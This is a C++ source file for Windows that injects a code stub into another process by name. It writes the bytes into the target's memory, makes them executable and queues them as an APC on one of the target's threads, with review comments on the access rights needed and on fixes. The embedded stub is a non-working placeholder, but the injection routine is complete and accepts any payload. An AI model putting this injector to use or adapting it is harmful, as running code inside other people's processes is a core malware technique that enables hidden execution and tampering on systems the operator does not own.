#include <windows.h>
#include <tlhelp32.h>
#include <cwchar>
#include <iostream>
#include <memory>
#include <vector>
// Forward declarations.
// Returns the PID of the first snapshot entry whose image name matches szProcessName,
// or 0xFFFFFFFF when the snapshot fails or nothing matches.
DWORD GetProcessID(const wchar_t* szProcessName);
// Queues the embedded code stub as a user APC on one thread of process dwPid and
// reports whether queuing succeeded. No DLL is loaded despite the name.
BOOL InjectDLL(DWORD dwPid);
// Entry point: resolve the hard-coded target image name to a PID, then queue the stub into it.
// Exit status is 1 on either failure, 0 once the APC has been queued.
// NOTE(review): opening a process owned by another user or session generally needs elevated
// rights on the caller's side — confirm for the intended target.
int main()
{
    const DWORD targetPid = GetProcessID(L"target_process.exe");
    const bool lookupFailed = (targetPid == 0xFFFFFFFF);
    if (lookupFailed)
    {
        std::cout << "GetProcessID failed." << std::endl;
        return 1;
    }

    const BOOL queued = InjectDLL(targetPid);
    std::cout << (queued ? "InjectDLL success." : "InjectDLL failed.") << std::endl;
    return queued ? 0 : 1;
}
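/// Resolve a process image name to a PID using a Toolhelp process snapshot.
///
/// The comparison is case-insensitive: Windows image names are not case-sensitive, so
/// "Target_Process.exe" and "target_process.exe" denote the same process. Exact matches
/// that worked before still match.
///
/// @param szProcessName  Image file name to look for (e.g. L"notepad.exe"); may be null.
/// @return The PID of the first matching entry, or 0xFFFFFFFF when the name is null, the
///         snapshot cannot be taken, or no entry matches. 0 is a real PID (System Idle), which
///         is why it is not used as the sentinel.
DWORD GetProcessID(const wchar_t* szProcessName)
{
    if (szProcessName == nullptr)
        return 0xFFFFFFFF;

    // CreateToolhelp32Snapshot reports failure with INVALID_HANDLE_VALUE, not NULL.
    // Test for that before handing the handle to an owning pointer, otherwise the
    // failure value would be passed to CloseHandle on scope exit.
    HANDLE rawSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (rawSnap == INVALID_HANDLE_VALUE)
    {
        std::cout << "CreateToolhelp32Snapshot failed." << std::endl;
        return 0xFFFFFFFF;
    }
    std::unique_ptr<void, decltype(&CloseHandle)> hSnap(rawSnap, &CloseHandle);

    // dwSize must be set before Process32FirstW, or the enumeration fails.
    PROCESSENTRY32W entry = { sizeof(entry) };
    for (BOOL ok = Process32FirstW(hSnap.get(), &entry); ok; ok = Process32NextW(hSnap.get(), &entry))
    {
        if (_wcsicmp(szProcessName, entry.szExeFile) == 0)
            return entry.th32ProcessID;
    }
    return 0xFFFFFFFF;
}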
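/// Queue a user APC in process dwPid that runs the embedded x64 stub.
///
/// NOTE(review): despite the name, no DLL is loaded — the stub bytes are what executes.
///
/// @param dwPid  Target process ID.
/// @return TRUE once the APC has been queued. This says nothing about whether the stub has
///         run: an APC fires only when the chosen thread next enters an alertable wait, and
///         nothing in this process is signalled when that happens.
///
/// Rights needed on the target: PROCESS_VM_OPERATION | PROCESS_VM_WRITE on the process and
/// THREAD_SET_CONTEXT on the thread (see the OpenProcess/OpenThread calls). Targets in
/// another session or owned by another user may need more than the caller has.
BOOL InjectDLL(DWORD dwPid)
{
    // x64 stub. It decodes as: sub rsp,28h / mov rax,rcx / lea rdx,[rsp+20h] /
    // mov rcx,[rcx+18h] / mov eax,0 / call rax / add rsp,28h / ret.
    // NOTE(review): this is a placeholder, not a working payload — `mov eax,0; call rax`
    // transfers to address 0, and [rcx+18h] is read through the APC argument, which is
    // passed as 0 below. As written the target faults when the APC fires.
    static const BYTE kStub[] = { 0x48, 0x83, 0xEC, 0x28, 0x48, 0x8B, 0xC1, 0x48, 0x8D, 0x54, 0x24, 0x20, 0x48, 0x8B, 0x49, 0x18, 0xB8,
                                  0x00, 0x00, 0x00, 0x00, 0xFF, 0xD0, 0x48, 0x83, 0xC4, 0x28, 0xC3 };
    const SIZE_T stubSize = sizeof(kStub);

    using UniqueHandle = std::unique_ptr<void, decltype(&CloseHandle)>;

    // Least privilege: VirtualAllocEx/VirtualProtectEx/VirtualFreeEx need PROCESS_VM_OPERATION
    // and WriteProcessMemory additionally needs PROCESS_VM_WRITE. PROCESS_ALL_ACCESS was far
    // more than this function uses. The handle was also never closed before.
    UniqueHandle hProcess(OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwPid), &CloseHandle);
    if (hProcess == nullptr)
    {
        std::cout << "OpenProcess failed." << std::endl;
        return FALSE;
    }

    // W^X: allocate writable only; execute permission is granted after the bytes are in place.
    LPVOID pRemote = VirtualAllocEx(hProcess.get(), nullptr, stubSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (pRemote == nullptr)
    {
        std::cout << "VirtualAllocEx failed." << std::endl;
        return FALSE;
    }
    // Release the remote buffer on every failure path below. On success it is intentionally
    // left mapped: there is no signal telling us when (or whether) the APC has finished with it.
    auto freeRemote = [&]() { VirtualFreeEx(hProcess.get(), pRemote, 0, MEM_RELEASE); };

    SIZE_T written = 0;
    if (!WriteProcessMemory(hProcess.get(), pRemote, kStub, stubSize, &written) || written != stubSize)
    {
        std::cout << "WriteProcessMemory failed." << std::endl;
        freeRemote();
        return FALSE;
    }
    DWORD oldProtect = 0;
    if (!VirtualProtectEx(hProcess.get(), pRemote, stubSize, PAGE_EXECUTE_READ, &oldProtect))
    {
        std::cout << "VirtualProtectEx failed." << std::endl;
        freeRemote();
        return FALSE;
    }
    // Make the freshly written code visible to the CPU before it can be executed.
    FlushInstructionCache(hProcess.get(), pRemote, stubSize);

    // Pick the first thread of the target to carry the APC. Which thread that is, and when it
    // next becomes alertable, is not under our control.
    HANDLE rawSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (rawSnap == INVALID_HANDLE_VALUE)
    {
        std::cout << "CreateToolhelp32Snapshot failed." << std::endl;
        freeRemote();
        return FALSE;
    }
    DWORD threadId = 0;
    {
        UniqueHandle hSnap(rawSnap, &CloseHandle);
        // dwSize must be initialised: Thread32First is documented to fail otherwise. The
        // original left THREADENTRY32 uninitialised, so enumeration did not work reliably and
        // every run fell through to "QueueUserAPC failed.".
        THREADENTRY32 te = { sizeof(te) };
        for (BOOL ok = Thread32First(hSnap.get(), &te); ok; ok = Thread32Next(hSnap.get(), &te))
        {
            if (te.th32OwnerProcessID == dwPid)
            {
                threadId = te.th32ThreadID;
                break;
            }
        }
    }
    if (threadId == 0)
    {
        std::cout << "No thread found in target process." << std::endl;
        freeRemote();
        return FALSE;
    }

    // QueueUserAPC needs THREAD_SET_CONTEXT on the thread handle; nothing more is used.
    UniqueHandle hThread(OpenThread(THREAD_SET_CONTEXT, FALSE, threadId), &CloseHandle);
    if (hThread == nullptr)
    {
        std::cout << "OpenThread failed." << std::endl;
        freeRemote();
        return FALSE;
    }
    // The APC argument is 0; the stub dereferences it (see the note on kStub).
    if (QueueUserAPC(reinterpret_cast<PAPCFUNC>(pRemote), hThread.get(), 0) == 0)
    {
        std::cout << "QueueUserAPC failed." << std::endl;
        freeRemote();
        return FALSE;
    }

    // No wait here. The original WaitForSingleObject(hThread, INFINITE) would have waited for
    // the *thread to exit*, not for the APC to run — and since the handle lacked SYNCHRONIZE it
    // failed immediately anyway. Completion of the APC is not observable from this process.
    return TRUE;
}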